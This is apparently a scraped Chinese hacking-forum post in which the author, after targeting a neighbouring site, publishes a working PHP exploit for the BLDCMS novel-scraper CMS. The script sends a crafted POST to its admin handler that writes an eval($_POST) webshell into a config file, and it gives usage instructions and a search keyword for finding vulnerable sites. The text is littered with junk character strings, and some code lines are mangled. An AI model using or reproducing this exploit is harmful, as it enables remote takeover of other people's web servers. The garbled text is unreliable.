之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
2 \. J' w* \9 m; ]. m* J3 G; c8 w' e/ f9 d' G; H, ~: y' ^
/ l9 g- Y* b* F! x7 `0 s1 p. Z话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
; W7 u6 o5 [9 q6 [; }4 J - l3 ^! o5 ]5 |$ ^; ?9 X
既然都有人发了 我就把我之前写好的EXP放出来吧! `1 h+ ~) c- L1 e
" m: z4 c: H. l3 Hview source print?01.php;">4 E3 C* H2 d$ G+ Q
02.<!--?php
2 A/ T! S. _; R03.echo "-------------------------------------------------------------------* `- p% O2 X, r5 w
04. ' G6 \4 Q9 Y* D
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP' h& i( F& U: }5 n# T: h4 M
06.
4 L# ~! r! I5 W& a0 Q2 |07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun9 O: O/ L$ t, U/ u
08.
5 v& @1 ]0 `0 g& L7 g8 \. l09.QQ:981009941\r\n 2013.3.21\r\n
: p& }* S( n. v10. 0 Q) ^6 H1 u. c# `' U
11.
7 P0 a( o" s# X9 W/ U/ q- E4 c12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码" G- M; Q( c: W! U
13.
" ]( j5 A0 J. b6 b3 J5 T14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
$ ]$ m1 p/ M8 D J15. 5 j$ V7 r5 b& N% Y7 d* r
16.--------------------------------------------------------------------\r\n";; u9 z1 ^0 `3 L+ h
17.$url=$argv[1];
) P1 X- e# P% Z18.$dir=$argv[2];9 M% W' w$ h1 Q! r9 n
19.$pass=$argv[3];
7 d: R8 A) D" ]5 o; g1 I: ~20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';5 D9 [1 O3 n! F2 B% y2 S
21.if (emptyempty($pass)||emptyempty($url))
2 r6 ^" @# ]2 `& | Y22.{exit("请输入参数");}$ b& o5 ^+ w) Z v
23.else. }" O) z! @: a; V1 |3 m. R* s
24.{7 x3 n( E6 E6 h& g4 ^. t- B# `& @
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
" c2 g( z' V2 x( f0 K! d8 @26.
- L) X$ M0 f' r' ?$ X. \. A27.al;
, O5 m$ P/ F$ d8 |7 z28.$length = strlen($fuckdata);4 v& ?/ k+ P& O9 I, r
29.function getshell($url,$pass)
+ C, m- L# c L' R30.{
1 b4 q; J" H ~& g# H' J31.global $url,$dir,$pass,$eval,$length,$fuckdata;
" {5 M4 ]* p( G" T+ A- o, j32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";( w9 P- ]9 G; y5 ^# c3 d( J' x
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";+ Z# z3 g' L1 ?7 C* A- K( Q- v
34.$header .= "User-Agent: MSIE\r\n";
/ i+ s+ ~; r7 ^( R. |) E: q8 ? J35.$header .= "Host:".$url."\r\n";0 z- Q" Z% C9 V# b
36.$header .= "Content-Length: ".$length."\r\n";3 k! F9 T. v4 ?* I
37.$header .= "Connection: Close\r\n";# c$ M- {4 y) m( F# ^
38.$header .="\r\n";8 J! D6 |0 I6 \1 u' w* h: p
39.$header .= $fuckdata."\r\n\r\n";
2 I @' o0 k1 a2 D/ P40.$fp = fsockopen($url, 80,$errno,$errstr,15);
# x* ]; D) a8 F5 k5 w# G( [41.if (!$fp)& Y. W) o- A" t7 a) c% C
42.{
% _% J+ J' p- M1 [4 K2 a" ^5 d43.exit ("利用失败:请检查指定目标是否能正常打开");
& }; d: |/ C2 e9 t9 h44.}/ D9 b9 h& _2 @/ ~
45.else{ if (!fputs($fp,$header)), ]8 u1 P# Q/ K/ H8 X5 v1 \( g' R1 f
46.{exit ("利用失败");}
$ i7 t# {' O' R47.else
9 S7 @" Q# }* }# P: @48.{8 P; d( F2 K7 S- r4 H
49.$receive = '';
& D5 U2 w8 |; E0 p* b50.while (!feof($fp)) {
4 g; _+ g6 r7 H8 M51.$receive .= @fgets($fp, 1000);* p2 O. {: }$ l# l$ E
52.}
( l4 j; V# E6 c$ n- R% }53.@fclose($fp);
3 I1 B! Y( D0 w0 F54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标; T2 ~6 I# [6 l# y$ T; D
55.
# w- R' X) ~: R1 b( {" W( Q56.GPC是否=off)";2 p. C1 i6 J+ n( E# R- ?' @
57.}}! u& |/ k+ C2 ?
58.}! G# N, i! g, Q! n0 I6 t* T; {
59.}' ?4 J) P4 Y7 L
60.getshell($url,$pass);& q* g! E" c; j1 r) i3 F. U
61.?-->: U2 }' E; ?: _! F
6 T; H3 B5 h) \5 \% F+ F2 `
4 ?8 Q# d2 K9 @) @; C" B
( s5 [( D6 `; y4 Z, i* M% |
by 数据流* I) |: Q+ c: _1 b
|
发表于 2013-3-26 20:49:10
收藏
支持
反对